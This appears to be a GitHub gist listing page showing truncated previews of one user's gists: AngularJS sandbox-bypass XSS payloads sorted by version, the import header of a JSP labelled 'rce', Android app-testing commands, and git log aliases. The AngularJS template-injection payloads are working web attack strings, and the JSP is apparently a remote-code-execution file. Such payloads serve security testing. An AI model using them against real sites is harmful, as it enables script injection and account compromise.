V N veeeeeeeeeee

veeeeeeeeeee / angular-xss.js

Created May 12, 2017 00:48

angular sandbox bypasses

	// 1.0.1 - 1.1.5
	{{constructor.constructor('alert(1)')()}}

	// 1.2.0 - 1.2.1
	{{a='constructor';b={};a.sub.call.call(b[a].getOwnPropertyDescriptor(b[a].getPrototypeOf(a.sub),a).value,0,'alert(1)')()}}

	// 1.2.2 - 1.2.5
	{{'a'[{toString:[].join,length:1,0:'__proto__'}].charAt=''.valueOf;$eval("x='"+(y='if(!window\\u002ex)alert(window\\u002ex=1)')+eval(y)+"'");}}

	// 1.2.6 - 1.1.18

veeeeeeeeeee / ios.sh

Last active November 18, 2017 08:16

iOS

veeeeeeeeeee / rce.jsp

Created March 15, 2017 04:36

rce

	<%@ page import="java.util.HashMap,
	java.io.*,
	java.util.Map,
	org.apache.commons.lang.StringUtils,
	com.day.cq.i18n.I18n,
	com.day.cq.personalization.UserPropertiesUtil,
	com.day.cq.wcm.api.WCMMode,
	com.day.cq.wcm.foundation.forms.FormsHelper,
	com.day.text.Text" %>
	<%@include file="/libs/foundation/global.jsp"%>

veeeeeeeeeee / android.sh

Last active November 18, 2017 08:16

android testing commands

	###### install into emulator
	adb install path\to\my\apk\file.apk

	###### decompile
	d2j-dex2jar path\to\my\apk\file.apk

	###### AndroidManifest
	java -jar apktool_2.0.3.jar d path\to\my\apk\file.apk -o output

	###### logs

veeeeeeeeeee / alias

Last active March 22, 2018 05:42

git stuffs

	[alias]
	lg = !"git lg1"
	lg1 = !"git lg1-specific --all"
	lg2 = !"git lg2-specific --all"
	lg3 = !"git lg3-specific --all"

	lg1-specific = log --graph --abbrev-commit --decorate --format=format:'%C(bold blue)%h%C(reset) - %C(bold green)(%ar)%C(reset) %C(white)%s%C(reset) %C(dim white)- %an%C(reset)%C(auto)%d%C(reset)'
	lg2-specific = log --graph --abbrev-commit --decorate --format=format:'%C(bold blue)%h%C(reset) - %C(bold cyan)%aD%C(reset) %C(bold green)(%ar)%C(reset)%C(auto)%d%C(reset)%n'' %C(white)%s%C(reset) %C(dim white)- %an%C(reset)'
	lg3-specific = log --graph --abbrev-commit --decorate --format=format:'%C(bold blue)%h%C(reset) - %C(bold cyan)%aD%C(reset) %C(bold green)(%ar)%C(reset) %C(bold cyan)(committed: %cD)%C(reset) %C(auto)%d%C(reset)%n'' %C(white)%s%C(reset)%n'' %C(dim white)- %an <%ae> %C(reset) %C(dim white)(committer: %cn <%ce>)%C(reset)'